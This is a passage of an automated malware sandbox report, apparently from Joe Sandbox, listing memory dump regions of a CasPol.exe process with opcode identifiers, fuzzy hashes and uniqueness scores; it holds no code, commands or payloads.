                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9e76d1be63255463866a7507489c293ef3c65cc51775566fb0ec59054978a31
                                          • Instruction ID: 4349b12ecead27b53c86e7c1f4ec387473dece8be0f5a578eea94c469d819048
                                          • Opcode Fuzzy Hash: e9e76d1be63255463866a7507489c293ef3c65cc51775566fb0ec59054978a31
                                          • Instruction Fuzzy Hash: BEE092B66006009FD750CF0AED81452F7E4EF88630708C47FDC0D8B701E276B504CAA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: adea628a98edeb1cdd85989ef9325b848bdcf69b0716555b39656a37926d8dbf
                                          • Instruction ID: a03a7dcf62dd37621b078ec2461d37ebc9421a0e576ea569e7f3e9fc11c3185e
                                          • Opcode Fuzzy Hash: adea628a98edeb1cdd85989ef9325b848bdcf69b0716555b39656a37926d8dbf
                                          • Instruction Fuzzy Hash: 64E0653AF001049FCF01EBBCD49899DB3F1AFC8224720816AD50AEB200EE30AE118B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33c09d191346b99b4e0e915750f6e9f683dee1d8ff0d9727b6a24763caba87bc
                                          • Instruction ID: 759d1450faa1beef53868018226b0afaa3f239a92db38aa1a1dcfb51f0fa605c
                                          • Opcode Fuzzy Hash: 33c09d191346b99b4e0e915750f6e9f683dee1d8ff0d9727b6a24763caba87bc
                                          • Instruction Fuzzy Hash: F1E06D36F001049FCF00EBBCD09899DB3F1AFC86247108065D50AE7240EE30AE118B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8e483be1e1373ebe3ab7693399f753932e224717854fefdbd9212dca5009a1ea
                                          • Instruction ID: d0305558c9d3e4ff0cb016b80c59997163b65c1a34f5028702fb7d5e50e9823d
                                          • Opcode Fuzzy Hash: 8e483be1e1373ebe3ab7693399f753932e224717854fefdbd9212dca5009a1ea
                                          • Instruction Fuzzy Hash: 40E06D36F001049FCF00EBFCD09899DB3F1AFC82657208066E50AEB310EE30AE118B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6696999493.000000001FCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fcd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9daad87de448f38b29335ca6a83270918046acf313b4743cf27e689bd2e5b09f
                                          • Instruction ID: 92aa1561b2fca63a088dcd0d2c230cf69fb2fc1b23ea5e51ed00abb6be9e44c8
                                          • Opcode Fuzzy Hash: 9daad87de448f38b29335ca6a83270918046acf313b4743cf27e689bd2e5b09f
                                          • Instruction Fuzzy Hash: B8E0D8B25403046FE3508E06AC85F13FBA8DF84930F04C567FE081B342E17275148AE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669196294.000000001D452000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D452000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d452000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 783465311bba8eb9dd0f69387c7c40545e3a9985879341002ec5dc4a0d1870f5
                                          • Instruction ID: 38d410fd6cb0cbb1ee4ba39f978f47c3eb7082b55a08f2073da7398c42aacf53
                                          • Opcode Fuzzy Hash: 783465311bba8eb9dd0f69387c7c40545e3a9985879341002ec5dc4a0d1870f5
                                          • Instruction Fuzzy Hash: 00D05E796057914FD3028A18C2E4FA937A4AF53714F5644FAA8409B773C768E581D602
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669196294.000000001D452000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D452000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d452000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 103845257b1075c186bf513b11d32fbb745b527a3136c1d265613fe37132832d
                                          • Instruction ID: aaa377bbbe0ef3fb285accb3315dfbefcbe57ab0081cda814e87f27c080341eb
                                          • Opcode Fuzzy Hash: 103845257b1075c186bf513b11d32fbb745b527a3136c1d265613fe37132832d
                                          • Instruction Fuzzy Hash: 78D05E347002854FD711CA28C2D0F6933E4AF44700F1244E9BC018F362C7A8E8C0D601
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,QIs$,QIs
                                          • API String ID: 0-470405259
                                          • Opcode ID: e230e30a25e6f94a95cda889311f923707b15df7d312624600c20fbd664475f5
                                          • Instruction ID: 6302d74555601de4e75ebf0306e04438fb7f2f2031913b9a875bfadc27c4fb2e
                                          • Opcode Fuzzy Hash: e230e30a25e6f94a95cda889311f923707b15df7d312624600c20fbd664475f5
                                          • Instruction Fuzzy Hash: 14C1C375A002058FDB28CF68C880AAEB7F6EF86310F16852BE656DB351DB34ED45C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646838713.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_d90000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,J'
                                          • API String ID: 0-3046419478
                                          • Opcode ID: ccef05f644db410ac36b7d160bbdbe3f0c84fb101dec929accb1e3c37877ad51
                                          • Instruction ID: ec8c704458af6c5bbaab70d6b2288d0069404035bc97fe2bd06999081113bdd2
                                          • Opcode Fuzzy Hash: ccef05f644db410ac36b7d160bbdbe3f0c84fb101dec929accb1e3c37877ad51
                                          • Instruction Fuzzy Hash: F8411C397103079BDF685A3845F57A722E2EF52290F99D17FDCC7CB2A5DB25C8888212
                                          Uniqueness

                                          Uniqueness Score: -1.00%